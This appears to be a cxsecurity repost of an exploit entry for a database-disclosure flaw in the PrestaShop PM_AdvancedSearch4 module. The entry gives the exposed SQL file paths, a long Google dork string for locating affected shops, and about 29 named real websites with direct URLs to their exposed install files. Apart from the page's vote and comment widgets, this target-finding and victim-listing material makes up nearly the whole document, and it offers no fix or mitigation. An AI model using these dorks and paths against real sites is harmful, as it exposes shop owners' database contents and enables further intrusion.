PrestaShop PM_AdvancedSearch4 Modules 1.6.1.18 Database Disclosure

2019.01.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

################################################################################################# # Exploit Title : PrestaShop PM_AdvancedSearch4 Modules 1.6.1.18 Database Disclosure # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 01/01/2019 # Vendor Homepage : prestashop.com # Software Download Link : addons.prestashop.com/fr/recherches-filtres/2778-advanced-search-4.html + addons.prestashop.com/es/busquedas-filtros/2778-advanced-search-4.html + addons.prestashop.com/en/search-filters/2778-advanced-search-4.html # Software Price : 200 Euro # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.4.6.2 - 1.4.10.0 - 1.4.9.0 - 1.4.8.2 - 1.4.7.0 - 1.5.6.0 - 1.6.0.12± - 1.6.1.1± - 1.6.1.17 - 1.6.1.4 - 1.6.1.18 # Exploit Risk : Medium # Google Dorks : inurl:''/modules/pm_advancedsearch4/'' intext:''© 2011 TS3V - Alarme-camera.fr'' intext:''cron module by samdha.net'' intext:''site realise par studio gonzo!'' intext:''© 2018 · acmotos · Tienda online de accesorios y recambios de moto.'' intext:''© CordesExpress groupe MPROSHOP - Tous droits réservés'' intext:'' © 2018 Approach Diffusion'' intext:''Piecesanspermis.fr 2018. Tous droit réservés.'' intext:''Design graphique : Regard Sur - Conception de site e-commerce : Sarah Ligerot'' intext:''© 2015-2018 - GROUPE GENIN'' intext:''2014 Advanced Power Systems All Rights Reserved'' site:shop intext:''conception anamorphik'' site:fr intext:''Copyright © MyBeers - 2018 |Création Tooeasy'' intext:''Powered by Blulab'' site:pl intext:''© Design by cybervelo'' # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] # PacketStormSecurity Exploit Reference Link : packetstormsecurity.com/files/150908/PrestaShop-PM_AdvancedSearch4-1.6.1.18-Database-Disclosure.html ################################################################################################# # Exploit : /modules/pm_advancedsearch4/install_base.sql /modules/pm_advancedsearch4/install_dyn.sql ################################################################################################# # Example Vulnerable Sites => [+] unami-store.com/modules/pm_advancedsearch4/install_base.sql [+] timeshoes.fr/modules/pm_advancedsearch4/install_base.sql [+] zazopack.com/modules/pm_advancedsearch4/install_base.sql [+] modelisme-vartex.com/modules/pm_advancedsearch4/install_dyn.sql [+] interieur-expression.com/modules/pm_advancedsearch4/install_dyn.sql [+] livingstonesgallery.com/modules/pm_advancedsearch4/install_dyn.sql [+] lounacasa.com/modules/pm_advancedsearch4/install_dyn.sql [+] formulapesca.com/modules/pm_advancedsearch4/install_dyn.sql [+] acmotos.com/modules/pm_advancedsearch4/install_dyn.sql [+] vspieces.com/modules/pm_advancedsearch4/install_dyn.sql [+] fesea.shop/modules/pm_advancedsearch4/install_dyn.sql [+] bikila.com/modules/pm_advancedsearch4/install_dyn.sql [+] alsace-sports-nautiques.com/modules/pm_advancedsearch4/install_dyn.sql [+] cordesexpress.com/modules/pm_advancedsearch4/install_dyn.sql [+] cybervelo.com/modules/pm_advancedsearch4/install_base.sql [+] erbolario.pl/modules/pm_advancedsearch4/install_base.sql [+] slowfoodeditore.it/modules/pm_advancedsearch4/install_base.sql [+] les7royaumes.com/modules/pm_advancedsearch4/install_base.sql [+] piecesanspermis.fr/modules/pm_advancedsearch4/install_base.sql [+] lespaniersdedavid.com/modules/pm_advancedsearch4/install_base.sql [+] phytomedica.fr/modules/pm_advancedsearch4/install_base.sql [+] marilashoes.com/modules/pm_advancedsearch4/install_base.sql [+] well.fr/modules/pm_advancedsearch4/install_base.sql [+] avecdesbijoux.fr/modules/pm_advancedsearch4/install_base.sql [+] groupe-genin.fr/modules/pm_advancedsearch4/install_base.sql [+] onduleur.shop/modules/pm_advancedsearch4/install_base.sql [+] mini-auto-parts.co.uk/modules/pm_advancedsearch4/install_base.sql [+] mybeers.fr/modules/pm_advancedsearch4/install_base.sql [+] ventidecor.com/modules/pm_advancedsearch4/install_base.sql ################################################################################################# # Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top